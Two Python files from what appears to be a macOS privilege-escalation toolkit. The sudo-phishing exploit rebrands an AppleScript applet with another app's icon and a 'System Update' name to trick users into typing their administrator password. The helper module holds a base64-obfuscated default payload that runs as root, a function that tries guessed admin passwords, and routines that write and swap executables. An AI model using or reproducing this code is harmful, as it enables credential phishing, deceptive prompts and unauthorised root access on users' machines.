 23 |     """edit app info"""
 24 |     plist = app_path + "/Contents/Info.plist"
 25 |     with open(plist, "rb") as f:
 26 |         info = plistlib.load(f)
 27 |     info["CFBundleName"] = prompt
 28 |     info["CFBundleIdentifier"] = "com.apple.ScriptEditor.id." + prompt.replace(" ", "")
 29 |     with open(plist, "wb") as f:
 30 |         plistlib.dump(info, f)
 31 | 
 32 | 
 33 | def admin_prompt(
 34 |     app=None, icon_path=None, prompt="System Update", command="echo hello"
 35 | ):
 36 |     """prompts with administrator privileges"""
 37 |     rand = random_string()
 38 |     print("\nPrompting: " + prompt)
 39 |     if app:
 40 |         app_path = "Prompt.app"
 41 |         zip_path = "Prompt.app.zip"
 42 |         if not os.path.exists(app_path) and os.path.exists(zip_path):
 43 |             os.system("unzip " + zip_path)
 44 |         full_app_path = app_installed(app)
 45 |         edit_app_info(app_path, prompt)
 46 |         if icon_path:
 47 |             icon_path = full_app_path + icon_path
 48 |         else:
 49 |             plist = app_info(app)
 50 |             icon_path = (
 51 |                 full_app_path + "/Contents/Resources/" + plist.get("CFBundleIconFile")
 52 |             )
 53 |         success_file = "/tmp/{success}".format(success=rand)
 54 |         os.system(
 55 |             'cp "{icon_path}" "{app_path}/Contents/Resources/applet.icns"; touch {app_path};'.format(
 56 |                 icon_path=icon_path, app_path=app_path
 57 |             )
 58 |         )
 59 |         payload = """open {app} --args "{c}; touch {sf}; chmod 666 {sf}; sleep 5; rm {sf}" "{p}" """.format(
 60 |             app=app_path, p=prompt, c=command.replace('"', '"'), sf=success_file,
 61 |         )
 62 |         os.system(payload)
 63 |         print("Application Launched...")
 64 |         wait = 0
 65 |         while not os.path.isfile(success_file):
 66 |             if wait > 60:
 67 |                 kill_app(app_path)
 68 |                 return
 69 |             if not app_running(app_path):
 70 |                 return
 71 |             sleep(1)
 72 |             wait += 1
 73 |         return True
 74 |     payload = """osascript <<END
 75 |       set command to "{command}; echo {success}"
 76 |       return do shell script command with prompt "{prompt}" with administrator privileges
 77 |     END""".format(
 78 |         prompt=prompt, command=command, success=rand
 79 |     )
 80 |     response = osascript(payload)
 81 |     return rand in response
 82 | 
 83 | 
 84 | def vulnerable(version):
 85 |     """checks vulnerability"""
 86 |     return interaction_prompt("Do you want to try to phish for sudo?")
 87 | 
 88 | 
 89 | def run():
 90 |     """runs exploit"""
 91 |     try:
 92 |         with open("apps.json") as json_file:
 93 |             APPS = json.load(json_file)
 94 |     except ValueError as error:
 95 |         print("Failed to load apps.json: " + str(error))
 96 |         APPS = dict()
 97 | 
 98 |     for priority_level in sorted(APPS.keys()):
 99 |         for app in APPS.get(priority_level).keys():
100 |             if app_installed(app) and app_running(app):
101 |                 app_values = APPS.get(priority_level).get(app)
102 |                 return admin_prompt(
103 |                     app=app,
104 |                     icon_path=app_values[0],
105 |                     prompt=app_values[1],
106 |                     command=DEFAULT_COMMAND,
107 |                 )
108 |     return admin_prompt(
109 |         app="System Preferences.app", prompt="System Update", command=DEFAULT_COMMAND
110 |     )
111 | 


--------------------------------------------------------------------------------
/exploits/general.py:
--------------------------------------------------------------------------------
  1 | import os
  2 | import uuid
  3 | from distutils.version import LooseVersion
  4 | from getpass import getuser
  5 | import plistlib
  6 | from subprocess import PIPE, Popen
  7 | from xml.parsers.expat import ExpatError
  8 | 
  9 | try:
 10 |     input = raw_input
 11 | except NameError:
 12 |     pass
 13 | 
 14 | DEFAULT_COMMAND = """python -c \"$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtHSmhjMlUyTkM1aU5qUmtaV052WkdVb0oxcFhUbTlpZVVGcFVWVjRUVWxGUmsxVVJEQnZVVlY0VFV0VFFrOVVNVUpDVlRGT1dGSkViMmRSVlhoTlNXbEJLMUJwUVhaYVdGSnFURE5PTVZwSE9XeGpiazA5SnlrcERRcGxiSE5sT2lCd2NtbHVkQ2hpWVhObE5qUXVZalkwWkdWamIyUmxLQ2RXV0U1c1kybENjR041UW5WaU0xRm5ZMjA1ZG1SQlBUMG5LU2s9Jykp | base64 -D)\" """  # noqa: E501
 15 | USER = getuser()
 16 | 
 17 | def random_string():
 18 |     """generates random string"""
 19 |     return str(uuid.uuid4())[:8]
 20 | 
 21 | def default_browser():
 22 |     """gets default browser"""
 23 |     try:
 24 |         with open(
 25 |             os.path.expanduser("~")
 26 |             + "/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist", "rb"
 27 |         ) as f:
 28 |             plist = plistlib.load(f)
 29 |     except ExpatError:
 30 |         return
 31 |     handlers = plist.get("LSHandlers")
 32 |     for handler in handlers:
 33 |         scheme = handler.get("LSHandlerURLScheme")
 34 |         if scheme and scheme in ["https", "http"]:
 35 |             return handler.get("LSHandlerRoleAll")
 36 |     return
 37 | 
 38 | def interaction_prompt(prompt):
 39 |     """"""
 40 |     return (
 41 |         input("\n[USER INTERACTION] {prompt} (y/N): ".format(prompt=prompt))[0].lower()
 42 |         == "y"
 43 |     )
 44 | 
 45 | def app_installed(app_name):
 46 |     """checks if app installed"""
 47 |     paths = ["/Applications/" + app_name, "~/Applications/" + app_name]
 48 |     for path in paths:
 49 |         if os.path.isdir(path):
 50 |             return path
 51 |     return
 52 | 
 53 | def app_running(app_name):
 54 |     """checks if app running"""
 55 |     return (
 56 |         not os.system('pgrep -f "{app_name}" > /dev/null'.format(app_name=app_name))
 57 |         == 256
 58 |     )
 59 | 
 60 | def app_info(app_name):
 61 |     """gets app info"""
 62 |     app_path = app_installed(app_name)
 63 |     try:
 64 |         with open(app_path + "/Contents/Info.plist", "rb") as f:
 65 |             return plistlib.load(f)
 66 |     except ExpatError:
 67 |         return
 68 | 
 69 | def app_version(app_name):
 70 |     """checks app version"""
 71 |     app_path = app_installed(app_name)
 72 |     try:
 73 |         with open(app_path + "/Contents/Info.plist", "rb") as f:
 74 |             plist = plistlib.load(f)
 75 |     except ExpatError:
 76 |         return
 77 |     return LooseVersion(plist.get("CFBundleVersion"))
 78 | 
 79 | def kill_app(app_path):
 80 |     """kills app"""
 81 |     os.system("pkill -f {app_path}".format(app_path=app_path))
 82 | 
 83 | def osascript(command):
 84 |     """runs shell for osascript"""
 85 |     osa = Popen([command], shell=True, stdout=PIPE, stderr=PIPE)
 86 |     response = osa.communicate()[0].strip()
 87 |     if isinstance(response, bytes):
 88 |         return response.decode("utf-8")
 89 |     return response
 90 | 
 91 | def get_values(i_obj):
 92 |     """gets values recursively"""
 93 |     values = list()
 94 |     if isinstance(i_obj, list):
 95 |         t_values = i_obj
 96 |     elif isinstance(i_obj, dict):
 97 |         t_values = i_obj.values()
 98 |     for t_value in t_values:
 99 |         if isinstance(t_value, dict):
100 |             values.extend(get_values(t_value))
101 |         elif isinstance(t_value, list):
102 |             values.extend(t_value)
103 |         else:
104 |             values.append(str(t_value))
105 |     return values
106 | 
107 | def try_password(password, user=USER):
108 |     """tries user passwords"""
109 |     rand = random_string()
110 |     payload = """osascript <<END
111 |       set command to "echo {success}"
112 |       return do shell script command user name "{user}" password "{password}" with administrator privileges
113 |     END""".format(
114 |         success=rand, user=user, password=password
115 |     )
116 |     response = osascript(payload)
117 |     return rand in response
118 | 
119 | def generates_bin(
120 |     bin_path, command=DEFAULT_COMMAND, shebang="#!/bin/bash", chmod="u+x"
121 | ):
122 |     """generates executable"""
123 |     with open(bin_path, "w") as bin_file:
124 |         bin_file.write(shebang)
125 |         bin_file.write(command)
126 |     os.chmod(bin_path, chmod)
127 |     return bin_path
128 | 
129 | def backup_bin(bin_path, extension=".bak"):
130 |     """backups executable"""
131 |     backup_path = bin_path + extension
132 |     os.rename(bin_path, backup_path)
133 |     return backup_path
134 | 
135 | def restore_bin(backup_path, extension=".bak"):
136 |     """backups executable"""
137 |     restore_path = backup_path.replace(extension, "")
138 |     os.rename(backup_path, restore_path)
139 |     return restore_path
140 | 


--------------------------------------------------------------------------------